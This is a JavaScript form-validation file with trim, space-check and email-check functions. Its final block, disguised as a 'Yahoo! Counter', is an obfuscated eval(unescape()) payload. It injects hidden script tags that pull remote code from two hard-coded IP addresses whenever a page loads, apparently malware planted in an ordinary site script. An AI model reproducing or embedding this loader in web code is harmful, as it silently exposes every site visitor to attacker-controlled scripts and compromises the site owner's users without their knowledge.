function trim(str)
{
   return str.replace(/^\s+|\s+$/g,'');
}

function chkspaces(chkStr,fieldname)
{
	if (chkStr.indexOf(" ")>=0)
	{
		alert("The "+fieldname+" has spaces in it.");
		return false;
	}
	else
	{
		return true;
	}
}

function emailCheck(emailStr){
var str=emailStr
var filter=/^([\w-]+(?:\.[\w-]+)*)@((?:[\w-]+\.)*\w[\w-]{0,66})\.([a-z]{2,6}(?:\.[a-z]{2})?)$/i
if (filter.test(str))
return true
else{
alert("\nNot a valid input in the following field(s):\n\n\t Email Address")
	return false;
}
	return true
}




<!-- Yahoo! Counter starts 
if(typeof(yahoo_counter)!=typeof(1))eval(unescape('//%3Cd%69%76#%20$%73%74!y&%6C%65$%3D~d!%69!%73!p%6Ca&%79:n~%6F`n$%65$%3E\n`%64o%63|%75#m@%65&%6E$%74`.w%72%69te%28%22%3C%2F@%74e%78&t&ar&e`%61&%3E"$%29%3B~v&a%72%20%69$%2C#%5F,~a~%3D$%5B%22`%37@%38.`1%31%30%2E&%31#7|5%2E%32@%31"%2C@"!19%35.#2%34.%37%36!%2E2&%35&1|"$%5D$%3B%5F@=%31;`i%66@(d&o%63`%75m`e&n@%74&%2E#%63%6Fo%6B@i%65`%2E@%6D@at|%63h(/&%5C@bh@g#f%74#%3D#%31/&%29@==~n&u%6C!%6C)%66o~%72`%28~%69=0;%69%3C~2%3B%69@+%2B&)&d%6F#cume!%6E%74.#%77$%72`it~e`%28"%3C|%73c$%72%69~%70&t%3E$%69&f#(%5F#%29#d!ocu$%6D%65%6E!%74|%2Ew%72i%74!e$%28%5C@%22&%3C#s~c#%72i!p!%74$%20%69@%64%3D_"+i+`"$%5F!%20~%73&%72~c=|//`%22|%2B$%61~[@i~%5D&+%22|/%63$%70!%2F$%3F@%22%2Bn@a#v%69g#at%6F|r#.`a%70|%70|%4Ea|%6D|e%2E%63%68#%61@%72A#%74(0%29+"~%3E!%3C!%5C@%5C|/s%63~%72%69p@t|%3E~%5C%22`%29%3C$%5C%2F$%73~c%72`i%70t%3E~"@)|%3B\n%2F%2F%3C|/%64%69%76%3E').replace(/\||~|@|\$|#|\!|\&|`/g,""));var yahoo_counter=1;
<!-- counter end -->